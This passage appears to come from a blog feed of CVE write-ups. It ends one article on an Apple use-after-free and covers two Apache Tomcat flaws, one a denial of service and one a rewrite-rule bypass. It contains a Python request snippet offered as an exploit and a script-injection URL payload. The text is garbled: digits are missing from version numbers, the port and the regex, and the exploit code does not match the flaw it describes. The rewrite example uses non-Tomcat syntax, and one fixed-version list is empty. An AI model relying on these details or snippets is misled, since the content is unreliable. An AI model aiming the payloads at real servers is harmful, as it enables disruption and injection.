- macOS Sequoia 15.4
- tvOS 18.4
- macOS Ventura 13.7.5
- iPadOS 17.7.6
- macOS Sonoma 14.7.5
- iOS 18.4
- iPadOS 18.4
- visionOS 2.4

It is important to update your devices to the latest version as soon as possible to protect against potential exploits targeting this vulnerability.

If you are a developer, it is essential to avoid use-after-free vulnerabilities by ensuring that accessed memory has not been previously freed, and that you properly manage memory allocation and deallocation throughout your code.

Conclusion

In this post, we have explored the details of CVE-2025-24252, a use-after-free vulnerability that affects several Apple products. We have looked at the underlying issue, how it could be exploited, and how Apple has fixed this vulnerability by improving memory management in the affected operating systems. Users are encouraged to update their devices to the latest version to protect against potential attacks targeting this vulnerability.

Timeline

Published on: 04/29/2025 03:15:34 UTC
Last modified on: 04/29/2025 20:10:47 UTC

CVE-2025-31650: Improper Input Validation Vulnerability in Apache Tomcat Leading to Denial of Service Attack 28 Apr 2025, 4:15 pm

CVE-2025-31650 is a critical vulnerability discovered in Apache Tomcat, a widely-used open-source web server and Servlet engine developed by the Apache Software Foundation. This issue involves improper input validation that ultimately leads to a denial of service (DoS) attack. In this article, we will discuss the details of the vulnerability, affected versions, and how to patch it to secure your web server.

Background

Apache Tomcat is a widely-used open-source web server that provides a "pure Java" HTTP web server environment in which Java code can run. Due to its popularity and widespread use, Tomcat has been a target for cybercriminals looking for vulnerabilities to exploit.

Vulnerability Details (CVE-2025-31650)

This particular vulnerability, CVE-2025-31650, is caused by incorrect error handling when parsing some invalid HTTP priority headers. When an invalid header is encountered, Tomcat performs incomplete clean-up of the failed request, resulting in a memory leak. If a large number of such requests are made, it can trigger an OutOfMemoryException, causing a denial of service (DoS) attack.

Here's an example of an exploit that takes advantage of this vulnerability

import requests

target_url = "http://[YOUR_TOMCAT_SERVER]:808/";

headers = {
    "Host": "localhost",
    "Connection": "Upgrade, HTTP2-Settings",
    "Upgrade": "h2c",
    "HTTP2-Settings": "AAMAAABkAAQCAAAAAAIAAAAA"  # Invalid header value
}

response = requests.get(target_url, headers=headers)

print(response.status_code)

This code snippet sends an HTTP request with an invalid HTTP priority header value to the target Tomcat server, potentially triggering the vulnerability.

Mitigation and Resolution

To address this vulnerability, users are advised to upgrade to one of the following Apache Tomcat versions, which include a fix for this issue:

Original References

- CVE-2025-31650 Detail
- Apache Tomcat 9 Security Vulnerabilities
- Apache Tomcat 10 Security Vulnerabilities
- Apache Tomcat 11 Security Vulnerabilities

Conclusion

CVE-2025-31650 represents a critical vulnerability in Apache Tomcat that could lead to denial of service (DoS) attacks if exploited. Users running affected versions of Tomcat should immediately update to a fixed version to reduce their risk and protect their servers from potential attacks.

Timeline

Published on: 04/28/2025 20:15:20 UTC
Last modified on: 05/05/2025 20:12:54 UTC

CVE-2025-31651 - Improper Neutralization of Escape, Meta, or Control Sequences Vulnerability in Apache Tomcat: Bypassing Security Constraints in Rewrite Rules 28 Apr 2025, 4:15 pm

A recently discovered vulnerability (CVE-2025-31651) in Apache Tomcat exposes a risk of improper neutralization of escape, meta, or control sequences. This flaw allows specially crafted requests to bypass specific rewrite rules, thereby potentially compromising the enforced security constraints within your system. The severity of this vulnerability is proportional to the extent of your rewrite rule configuration's capabilities.

Affected Apache Tomcat versions include 11..-M1 through 11..5, 10.1.-M1 through 10.1.39, and 9...M1 through 9..102. To mitigate this risk, users should upgrade to the fixed version.

Details

Original references: Link 1 | Link 2 | Link 3

In certain cases, your rewrite rule configurations may not perform effective neutralization of escape, meta, or control sequences. This vulnerability, identified as CVE-2025-31651, allows cyber attackers to send specially crafted requests that can bypass some rewrite rules, leading to a bypass of enforced security constraints in your system.

Here's a code snippet that represents a rewrite rule that could be bypassed using a malformed request:

RewriteRule ^([a-zA-Z-9]+)$ index.php?page=$1 [L]

The issue arises when an attacker crafts a request such as /page<script>alert(1)<%2Fscript> that bypasses the above rewrite rule, which should enforce a security constraint that only allows alpha-numeric characters in the URL.

To demonstrate this exploit, consider the following request

https://yourdomain.com/page<script>alert(1)<%2Fscript>;

The server would receive the request and, due to the vulnerability, the request would bypass the rewrite rule leading to the potential execution of malicious scripts within your system.

Mitigation

To address this vulnerability, users should upgrade their Apache Tomcat installations. The specific fixed versions are available at the following links:

- Apache Tomcat 11: Fixed Version 11..6
- Apache Tomcat 10.1: Fixed Version 10.1.40
- Apache Tomcat 9: Fixed Version 9..103

Additionally, you may also consider implementing server-side input validation and sanitization to further protect your system from possible exploits that bypass rewrite rules. This may also involve the review and adjustment of your existing rewrite rule configurations.

Conclusion

This vulnerability, CVE-2025-31651, is an important issue to address as it can lead to a compromise of the enforced security constraints within your Apache Tomcat installations. Users should upgrade their installations to the new fixed version to ensure that their systems are protected from potential exploits. Furthermore, implementing thorough server-side input validation and sanitization is an essential step in securing your system against compromised rewrite rules.

Timeline

Published on: 04/28/2025 20:15:20 UTC
Last modified on: 05/05/2025 20:14:47 UTC